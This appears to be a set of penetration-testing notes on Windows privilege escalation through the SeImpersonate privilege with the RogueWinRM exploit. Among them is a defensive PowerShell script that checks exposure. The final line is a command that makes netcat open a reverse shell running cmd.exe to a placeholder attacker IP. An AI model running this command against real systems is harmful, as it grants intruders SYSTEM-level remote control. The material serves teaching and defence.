
SeImpersonate - SeAssignPrimaryToken

Required Privileges: Administrators - SeAssignPrimaryTokenPrivilege - SeImpersonatePrivilege
Note

Only possible if the WinRM service is not running. That is the default on Windows 10 but not on Windows Server 2019.


The privileges SeAssignPrimaryToken and SeImpersonate allow a process to impersonate other users and act on their behalf. Impersonation usually consists of being able to spawn a process or thread under the security context of another user.

On Windows systems, the LOCAL SERVICE and NETWORK SERVICE accounts already hold these privileges. Internet Information Services (IIS) also creates a similar default account for web applications.

To elevate privileges from such an account we need to spawn a process that users can connect and authenticate to, so that impersonation can occur, and then find a way to force a privileged user to connect and authenticate to that spawned malicious process. The RogueWinRM exploit accomplishes both of these conditions.


RogueWinRM

The RogueWinRM exploit is possible because whenever a user (including unprivileged users) starts the BITS service (Background Intelligent Transfer Service) on Windows, it automatically opens a connection to port 5985 with SYSTEM privileges.

Port 5985 is typically used by the WinRM service (Windows Remote Management), which exposes a PowerShell console for remote use over the network (similar to SSH).

If the WinRM service isn't running on the target machine, an attacker can start a fake WinRM service on port 5985 and catch the authentication attempt made by the BITS service as it starts. If the attacker holds the SeImpersonate privilege, they can execute any command on behalf of the connecting user, which is SYSTEM.
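As an added defender-side check (not part of the original notes or of the RogueWinRM project), the script below reports whether the precondition described above holds on a host: the WinRM service stopped and TCP 5985 left unbound. It assumes that a legitimate WinRM listener shows the kernel System process (PID 4) as the port owner because HTTP.sys binds the port, so a user-mode process holding 5985 while WinRM is stopped is worth investigating.

```powershell
# Added example: report the RogueWinRM exposure state of the local host.
# Assumption: genuine WinRM is served by HTTP.sys, so the listener on 5985
# is owned by the System process (PID 4); anything else deserves a look.
function Get-WinRmPortStatus {
    [CmdletBinding()]
    param([int]$Port = 5985)

    $svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue
    $listeners = Get-NetTCPConnection -LocalPort $Port -State Listen -ErrorAction SilentlyContinue

    # Resolve every process currently bound to the port.
    $owners = foreach ($conn in $listeners) {
        $proc = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{
            LocalAddress = $conn.LocalAddress
            Pid          = $conn.OwningProcess
            ProcessName  = if ($proc) { $proc.ProcessName } else { 'unknown' }
        }
    }

    $serviceRunning = ($svc -and $svc.Status -eq 'Running')

    # Service stopped and port free   -> the BITS startup authentication has no
    #                                    legitimate receiver; a rogue listener could take it.
    # Service stopped but port bound  -> something else already owns 5985; inspect it.
    # Service running                 -> the precondition for RogueWinRM is absent.
    $finding = if (-not $serviceRunning -and -not $owners) {
        'EXPOSED: WinRM stopped and TCP {0} unbound' -f $Port
    } elseif (-not $serviceRunning) {
        'SUSPICIOUS: WinRM stopped but TCP {0} is bound; check the owning process' -f $Port
    } elseif ($owners | Where-Object { $_.Pid -ne 4 }) {
        'SUSPICIOUS: WinRM running but TCP {0} has a non-System owner' -f $Port
    } else {
        'OK: WinRM running and TCP {0} owned by System (HTTP.sys)' -f $Port
    }

    [pscustomobject]@{
        WinRMStatus = if ($svc) { $svc.Status.ToString() } else { 'NotInstalled' }
        Listeners   = $owners
        Finding     = $finding
    }
}

Get-WinRmPortStatus | Format-List
```

Run it from an elevated PowerShell session so that Get-Process can resolve the names of listeners owned by other users' processes.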



The exploit may take up to 2 minutes to work

This happens if we run the exploit multiple times, as it must wait for the BITS service to stop before starting it again. The BITS service stops automatically after 2 minutes.


To make this work we need to copy RogueWinRM and Netcat to the target machine, then start a listener on our machine.

RogueWinRM.exe -p "Netcat Location" -a "-e cmd.exe <Attacker IP> <PORT>"